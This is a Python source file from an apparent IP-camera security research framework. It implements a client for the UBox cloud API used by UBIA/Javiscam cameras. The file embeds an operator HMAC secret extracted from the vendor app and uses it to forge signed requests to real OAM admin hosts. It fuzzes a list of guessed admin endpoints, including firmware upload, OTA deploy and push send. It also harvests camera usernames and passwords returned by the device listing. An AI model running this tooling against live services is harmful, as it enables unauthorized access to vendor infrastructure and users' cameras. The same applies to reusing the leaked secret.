Files
cam-mitm/api/ubox_client.py
sssnake 800052acc2 Initial commit — SetecSuite Camera MITM Framework
Original tooling from the Camhak research project (camera teardown of a
rebranded UBIA / Javiscam IP camera). PyQt6 GUI on top of a curses TUI on
top of a service controller; per-service start/stop, intruder detection,
protocol fingerprinting, OAM HMAC signing, CVE verifiers, OTA bucket
probe, firmware fetcher, fuzzer, packet injection.

Tabs: Dashboard, Live Log, Intruders, Cloud API, Fuzzer, Inject, CVEs,
Config, Help. Real-time per-packet protocol detection, conntrack-based
original-destination lookup, log rotation at 1 GiB.

See SECURITY_PAPER.md for the full writeup, site/index.html for the
public report, README.md for usage. Run with:
    sudo /usr/bin/python3 gui.py

Co-authored by Setec Labs.
2026-04-09 08:14:18 -07:00

258 lines
9.5 KiB
Python

"""UBox cloud API client — authenticate, list devices, check firmware, etc."""
import hashlib
import hmac
import base64
import json
import time
import urllib.request
import urllib.error
from utils.log import log, C_SUCCESS, C_ERROR, C_INFO, C_TRAFFIC, C_IMPORTANT
# ─── OAM (operator/admin) endpoint signing ───────────────────────
# Hardcoded secret extracted from com/http/OamHttpClient.java:28
OAM_BASE_URLS = [
"https://oam.ubianet.com/api",
"https://dev.ubianet.com/oam/api",
]
OAM_APPID = "30001"
OAM_CLIENT_ID = "" # empty in app code; may need to be set per-deployment
OAM_SECRET = "2894df25f8f740dff5266bc155c662ca"
def oam_sign(body_str, ts_ms, appid=OAM_APPID, client_id=OAM_CLIENT_ID,
secret=OAM_SECRET):
"""
Reproduce com.http.Encryption.Hmac:
sig_str = "<ts>:<appid>:<clientId>:<body>"
hmac = HmacSHA1(sig_str.utf8, secret.bytes)
result = hex(hmac)
"""
sig_str = f"{ts_ms}:{appid}:{client_id}:{body_str}"
h = hmac.new(secret.encode("utf-8"), sig_str.encode("utf-8"), hashlib.sha1)
return h.hexdigest()
def oam_post(endpoint, data, base_url=None):
"""
POST to an OAM endpoint with the OAM-SIGN header set.
Tries each known OAM base URL if the first fails.
"""
body = json.dumps(data).encode("utf-8")
body_str = body.decode("utf-8")
ts_ms = str(int(time.time() * 1000))
sign = oam_sign(body_str, ts_ms)
headers = {
"Content-Type": "application/json",
"OAM-SIGN": sign,
"OAM-APPID": OAM_APPID,
"CLIENT-ID": OAM_CLIENT_ID,
"timestamp": ts_ms,
"X-UbiaAPI-CallContext": "source=app&app=ubox&ver=1.1.360&osver=14",
}
bases = [base_url] if base_url else OAM_BASE_URLS
last_err = None
for b in bases:
url = f"{b}/{endpoint}"
log(f"OAM: POST {url}", C_INFO)
log(f" sign-str = {ts_ms}:{OAM_APPID}::{body_str[:80]}", C_INFO)
log(f" OAM-SIGN = {sign}", C_INFO)
req = urllib.request.Request(url, data=body, method="POST", headers=headers)
try:
with urllib.request.urlopen(req, timeout=15) as resp:
payload = json.loads(resp.read().decode("utf-8"))
log(f"OAM: {json.dumps(payload, indent=2)[:400]}", C_TRAFFIC)
return payload
except urllib.error.HTTPError as e:
body_text = e.read().decode("utf-8", errors="replace")[:400]
log(f"OAM: HTTP {e.code} from {b}: {body_text}", C_ERROR)
last_err = {"error": e.code, "body": body_text, "base": b}
except Exception as e:
log(f"OAM: error from {b}: {e}", C_ERROR)
last_err = {"error": str(e), "base": b}
return last_err or {"error": "all OAM bases failed"}
def oam_fuzz(endpoints):
"""
Hit a list of candidate OAM endpoints with empty bodies and report
which ones return non-404 responses (i.e. exist).
"""
results = {"hits": [], "404s": 0, "errors": 0, "tried": 0}
for ep in endpoints:
results["tried"] += 1
r = oam_post(ep, {})
if isinstance(r, dict):
err = r.get("error")
if err == 404:
results["404s"] += 1
elif err is not None:
results["errors"] += 1
results["hits"].append({"endpoint": ep, "error": err,
"body": r.get("body", "")[:200]})
else:
# Real JSON came back (msg=success or msg=fail with code)
results["hits"].append({"endpoint": ep,
"code": r.get("code"),
"msg": r.get("msg"),
"data": r.get("data")})
log(f"OAM-FUZZ: ✓ {ep} -> code={r.get('code')} msg={r.get('msg')}",
C_IMPORTANT)
log(f"OAM-FUZZ done: {len(results['hits'])} hits / {results['tried']} tried "
f"({results['404s']} 404s, {results['errors']} errors)", C_SUCCESS)
return results
# Candidate OAM endpoints — confirmed in source + admin guesses
OAM_ENDPOINT_GUESSES = [
# Confirmed in OamHttpClient.java
"lgc/bind_err",
"app/push_channel_reg",
# Common admin patterns to probe
"oam/users", "oam/user/list", "oam/user/info",
"oam/devices", "oam/device/list", "oam/device/info",
"oam/firmware", "oam/firmware/list", "oam/firmware/upload",
"oam/ota", "oam/ota/list", "oam/ota/deploy", "oam/ota/push",
"oam/config", "oam/cloud/config", "oam/cloud/keys",
"oam/stats", "oam/dashboard", "oam/system",
"oam/logs", "oam/audit", "oam/security",
"user/list", "user/info", "user/all",
"device/list", "device/info", "device/all",
"firmware/list", "firmware/all", "firmware/latest",
"ota/list", "ota/all", "ota/deploy",
"admin/users", "admin/devices", "admin/firmware",
"admin/config", "admin/system", "admin/stats",
"stats", "dashboard", "system/info", "system/version",
"lgc/bind_ok", "lgc/list", "lgc/info",
"app/version", "app/config",
"push/list", "push/send", "push/all",
]
def hash_password(password):
h = hmac.new(b"", password.encode("utf-8"), hashlib.sha1).digest()
b64 = base64.b64encode(h).decode("utf-8")
return b64.replace("+", "-").replace("/", "_").replace("=", ",")
def api_post(base_url, endpoint, data, token=None):
url = f"{base_url}/{endpoint}"
body = json.dumps(data).encode("utf-8")
req = urllib.request.Request(url, data=body, method="POST")
req.add_header("Content-Type", "application/json")
req.add_header("X-UbiaAPI-CallContext", "source=app&app=ubox&ver=1.1.360&osver=14")
if token:
req.add_header("X-Ubia-Auth-UserToken", token)
try:
with urllib.request.urlopen(req, timeout=15) as resp:
return json.loads(resp.read().decode("utf-8"))
except urllib.error.HTTPError as e:
return {"error": e.code, "body": e.read().decode("utf-8", errors="replace")[:500]}
except Exception as e:
return {"error": str(e)}
def login(cfg):
if not cfg["api_email"] or not cfg["api_password"]:
log("API: set api_email and api_password first", C_ERROR)
return False
hashed = hash_password(cfg["api_password"])
data = {
"account": cfg["api_email"], "password": hashed,
"app": "ubox", "app_version": "1.1.360",
"device_type": 1, "lang": "en", "brand": "Python",
"device_token": "none", "regid_jg": "fail",
"regid_xm": "fail", "regid_vivo": "fail",
}
log(f"API: logging in as {cfg['api_email']}...", C_INFO)
result = api_post(cfg["api_base"], "v3/login", data)
if result and result.get("msg") == "success":
cfg["api_token"] = result["data"]["Token"]
log(f"API: login OK — token={cfg['api_token'][:20]}...", C_SUCCESS)
# Extract app_config keys
app_cfg = result["data"].get("app_config", {})
if app_cfg:
log(f"API: leaked app_config keys extracted", C_IMPORTANT)
cfg.save()
return True
else:
log(f"API: login failed: {json.dumps(result)[:200]}", C_ERROR)
return False
def devices(cfg):
if not cfg["api_token"]:
log("API: login first", C_ERROR)
return []
result = api_post(cfg["api_base"], "user/device_list", {}, cfg["api_token"])
if result and result.get("msg") == "success":
devs = result["data"].get("list", [])
fw = result["data"].get("firmware_ver", [])
log(f"API: {len(devs)} device(s), firmware: {fw}", C_SUCCESS)
for d in devs:
uid = d.get("device_uid", "?")
name = d.get("name", "?")
cu = d.get("cam_user", "")
cp = d.get("cam_pwd", "")
model = d.get("model_num", "?")
bat = d.get("battery", "?")
log(f" [{uid}] {name} model={model} bat={bat}%", C_TRAFFIC)
if cu and cp:
log(f" LEAKED CREDS: {cu} / {cp}", C_IMPORTANT)
cfg["device_uid"] = uid
cfg["device_cam_user"] = cu
cfg["device_cam_pwd"] = cp
cfg.save()
return devs
else:
log(f"API: {json.dumps(result)[:300]}", C_ERROR)
return []
def check_firmware(cfg):
if not cfg["api_token"] or not cfg["device_uid"]:
log("API: login and get devices first", C_ERROR)
return None
result = api_post(cfg["api_base"], "user/qry/device/check_version/v3", {
"device_uid": cfg["device_uid"],
"host_version": "0.0.0.1",
"wifi_version": "0.0.0.1",
"is_lite": False, "zone_id": 2,
}, cfg["api_token"])
log(f"API firmware: {json.dumps(result, indent=2)}", C_TRAFFIC)
return result
def device_services(cfg):
if not cfg["api_token"] or not cfg["device_uid"]:
log("API: login and get devices first", C_ERROR)
return None
result = api_post(cfg["api_base"], "user/qry/device/device_services",
{"device_uid": cfg["device_uid"]}, cfg["api_token"])
log(f"API services: {json.dumps(result, indent=2)[:600]}", C_TRAFFIC)
return result
def raw_request(cfg, endpoint, data=None):
if not cfg["api_token"]:
log("API: login first", C_ERROR)
return None
log(f"API: POST {endpoint}", C_INFO)
result = api_post(cfg["api_base"], endpoint, data or {}, cfg["api_token"])
log(f"API: {json.dumps(result, indent=2)[:800]}", C_TRAFFIC)
return result
def families(cfg):
return raw_request(cfg, "user/families")
def device_list_v2(cfg):
return raw_request(cfg, "v2/user/device_list")